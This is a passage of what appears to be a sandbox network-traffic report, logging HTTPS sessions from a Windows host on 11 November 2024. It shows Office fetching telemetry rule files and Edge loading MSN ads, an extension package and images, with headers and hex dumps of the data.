37	192.168.2.5	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 2f59f176-901e-002a-79d5-337a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968xlwnmhC1EWR0sv800000004m00000000047ah x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: cd0babfe-b01e-0002-56d5-331b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968jrjrxhC1EWRmmrs00000004xg0000000033u2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 4e338842-401e-0016-31d5-3353e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093323Z-174f7845968j6t2phC1EWRcfe800000004x00000000049uy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:23 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49807	20.1.248.118	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	1067	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=18874E57A98C67C518B55B63A89566FE&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=80a034c22b5c4399f72cc08494ff6e32 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1
2024-11-11 09:33:23 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 11 Nov 2024 09:33:22 GMT Connection: close
2024-11-11 09:33:23 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49808	23.200.0.34	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	616	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731922400&P2=404&P3=2&P4=fEdZybqmv55z90yFNuAxGl%2fHxJ12fYMM0nJgasQZB7mtpHA5D2vpo1XiMFHk%2bPAeOMPQzgOzRNCH9U7zHIsTjg%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: Vd7dXxmYq58VAfMJ+gUGCz Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:24 UTC	1248	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: c7f9b80f-ae3d-4cd4-b2f0-9bcfb1133781 MS-RequestId: f9326964-8b9c-4691-8aa9-05e878ae20df MS-CV: UedlNLvHhJTOO00g+Kull8.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86400 Date: Mon, 11 Nov 2024 09:33:24 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.45.172.22,b=682851870,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_SECAUCUS,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.16ac2d17.1731317603.28b37e1e Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
2024-11-11 09:33:24 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49814	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	634	OUT	GET /tenant/amp/entityid/BB1msFQv.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:24 UTC	519	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msFQv Last-Modified: Mon, 28 Oct 2024 14:42:25 GMT X-Source-Length: 66523 X-Datacenter: eastap X-ActivityId: 695efb4d-78b1-4e8a-818e-23a153cc46b6 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 66523 Cache-Control: public, max-age=407377 Expires: Sat, 16 Nov 2024 02:43:00 GMT Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close
2024-11-11 09:33:24 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: b4 94 7b ee fe e0 1f 5a d7 e1 f9 fd 45 f2 47 3f a0 fe 29 65 f5 3b e3 b3 cd 3f d4 ab 34 97 89 76 df 59 b9 3c 74 c7 4b 5e eb b6 ef bf 90 dc e2 88 5b 72 7c 1d fb 26 af 13 85 1e ae 52 6d 61 6b 86 28 af f3 2e 4e a9 a7 e2 b0 f3 b0 c7 1c c7 f1 4f 23 d0 ea f1 26 b5 cc f3 5f 98 dc 72 6a 31 4e bc be e3 57 ad 6d 5e 17 c9 bf a5 83 9c 17 71 2d a9 be c7 77 50 f5 1e 63 f3 33 ab d2 bc 29 df cc b1 6f c9 ab ac 3b f2 ef 45 62 8e 64 fc 72 c8 f4 5e b1 2e 28 17 bd 15 c4 f3 8f 7e 49 aa 85 ae 7e 1f 22 df 5c b8 2b 0c 50 cc 5f 1c f2 3b 6f a8 e4 bc ca bd 74 f9 9c 77 bd 2c 29 2e df e6 48 ee cb 8b ae 58 26 56 38 87 c7 2b 3a 56 e5 9b 6c 87 37 d6 c9 5e 37 d8 91 6e b9 35 9a 5d e1 f2 20 f8 65 d0 e8 a9 4b 9b f3 16 b9 3c db f3 30 7a de 19 bf 00 e3 b9 29 7e d4 bb 6f e5 80 63 88 7c 52 e8 6e Data Ascii: {ZEG?)e;?4vY<tK^[r\|&Rmak(.NO#&_rj1NWm^q-wPc3)o;Ebdr^.(~I~"\+P_;otw,).HX&V8+:Vl7^7n5] eK<0z)~oc\|Rn
2024-11-11 09:33:24 UTC	1698	IN	Data Raw: 12 8b 8d 24 ab 87 f3 3a 1a 95 60 82 7c d6 af dc 22 55 29 6e b6 b4 e9 8c 78 f1 7d 86 8e 18 b3 1c e5 b9 fb 74 2e fb 62 4b 57 a4 db f9 21 55 a5 c2 f0 e4 3c cd 0a 7b 7a 9a 4e df 6b af b9 1a 55 23 36 dc 63 05 ee d2 2f 72 c3 e8 43 ae d7 ee 51 4e ec b7 2f dd c3 c6 fe e2 dd bd c4 d7 bc f1 38 fe be 70 9e 2e 5b 97 92 4b 25 f1 c4 eb 45 a9 66 a8 d2 51 a4 b4 5e 28 84 ee cd 9a 97 79 4b 9a 96 1e f2 f1 cb ed 12 7a 56 5f 22 9d c6 e6 bd df 71 f3 ab 32 4b 5f ea 51 b6 34 92 4a fb 5d b0 df 81 87 69 49 2f 7a 56 fb 6b ef 35 55 92 f9 00 a2 e7 c5 69 ee 95 fd 0b 3b cc 52 94 36 bc 06 b7 65 2c a3 e7 80 e9 f2 2a 2c 96 de c4 bd 28 6d 37 dd 1b c3 e6 67 7d 17 4b 2f f6 d6 3c 9c 97 b1 9a d5 f1 ab 0e eb 3a 0c 4d 70 df 99 38 56 47 29 fe 99 d3 bc bd 64 7b a5 7e d4 fb 8c df e1 31 6f ff 00 96 Data Ascii: $:`\|"U)nx}t.bKW!U<{zNkU#6c/rCQN/8p.[K%EfQ^(yKzV_"q2K_Q4J]iI/zVk5Ui;R6e,*,(m7g}K/<:Mp8VG)d{~1o
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 2f d3 05 e9 4a df 9f c8 7a d7 08 be dc 09 fa fd 11 4f d9 74 ee 12 be 36 fc 2e 82 c7 82 8c 7c 73 65 77 27 c9 77 2f a8 d4 6f 83 97 cc 91 92 d7 ee 93 6f 92 fb 0b 14 9f ed 87 9e 05 9a 74 ac ab c8 cd eb f5 3a 84 45 cf 08 1e 9c ba 34 d4 de 6d 2e e5 f5 1b a5 9c 97 6b 2a 50 9c bd 29 76 2c 0b e3 b7 18 e3 5d a4 bd 3b f9 14 b5 ed e6 0e a4 f2 4d f6 7d 4b 13 7c a8 ad ee ed 47 8d f7 62 25 39 4b 28 a5 e3 2f a2 15 5f 6f 30 be be 45 be f3 e2 fb 30 06 3b 70 8e 34 bb ff 00 98 49 37 9b fb 82 d2 2b eb e4 55 74 0b 5c 23 e3 dd 88 12 dd dc 97 a3 1a f1 7f 40 94 54 73 68 7a a3 c0 9d 32 6f c4 7a e7 5e 05 2b 6e 72 f4 e6 df 86 4b e4 69 8c 12 e4 8a b5 cb 82 ae f6 06 99 cf 39 3f ed c3 ed 1e af 96 90 95 2e 15 9a 9e e6 dc 33 65 3e be 53 f4 22 d7 8c b0 fb 45 1d 98 ac 6b b4 d2 a2 96 66 6f Data Ascii: /JzOt6.\|sew'w/oot:E4m.k*P)v,];M}K\|Gb%9K(/_o0E0;p4I7+Ut\#@Tshz2oz^+nrKi9?.3e>S"Ekfo
2024-11-11 09:33:24 UTC	16192	IN	Data Raw: be c3 d2 c6 47 8d d8 7e af 79 78 e0 7a b5 85 15 bc 95 f8 91 b2 dd 78 1d 58 bc 0b 1e 4c c5 17 91 a9 4b 03 cd 68 ee 47 3b 7b 71 c5 78 fc 62 70 77 7a 87 69 5d 26 7a 5d f8 a9 57 91 e5 3a 9d 97 8f 87 b0 f4 36 30 b3 8f 7a d7 07 a9 db d3 a5 28 e5 cc d2 a2 78 ee 93 ac 7b 2f d5 cf d0 79 3e 2b ec 3d 96 dc d3 39 f7 60 e0 ff 00 a9 b6 dc 94 d7 f4 1e 8f 10 96 15 c0 d3 4a 8a 27 87 77 c6 47 2a 76 6e 04 f7 33 f8 68 e4 6f 4d 3c f1 b2 cd d9 d5 9c 77 2b 9c 13 c5 39 2b 5c ce ed bd ba 39 77 27 d8 d5 b1 b2 e7 2d 5c 23 e8 f8 b3 bc ac ae 35 54 5e bc 4c a7 2c 45 c6 34 8b 22 68 58 95 a4 13 5c 79 1c 8c dc b9 3c 71 05 b3 1c a7 4b c7 81 cd dc ea a4 ae cb 8e db 97 04 39 24 6a de f3 38 7b f0 6e d5 36 6c da df 7d 44 da 79 2c f0 c7 b8 eb a8 43 1c 17 d4 eb bf 8b 93 06 96 e7 81 87 a6 8c a1 Data Ascii: G~yxzxXLKhG;{qxbpwzi]&z]W:60z(x{/y>+=9`J'wG*vn3hoM<w+9+\9w'-\#5T^L,E4"hX\y<qK9$j8{n6l}Dy,C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49812	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:23 UTC	515	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL Last-Modified: Thu, 07 Nov 2024 12:58:05 GMT X-Source-Length: 1658 X-Datacenter: eastus X-ActivityId: ba24fde8-14e0-48b8-a3cb-6556d76b4d9b Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 1658 Cache-Control: public, max-age=98652 Expires: Tue, 12 Nov 2024 12:57:35 GMT Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close
2024-11-11 09:33:23 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49813	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:23 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:23 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Tue, 29 Oct 2024 01:40:51 GMT X-Datacenter: northeu X-ActivityId: 0accdf79-c791-4c7c-a2a4-4b49d6a1d7fc Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=58112 Expires: Tue, 12 Nov 2024 01:41:55 GMT Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close
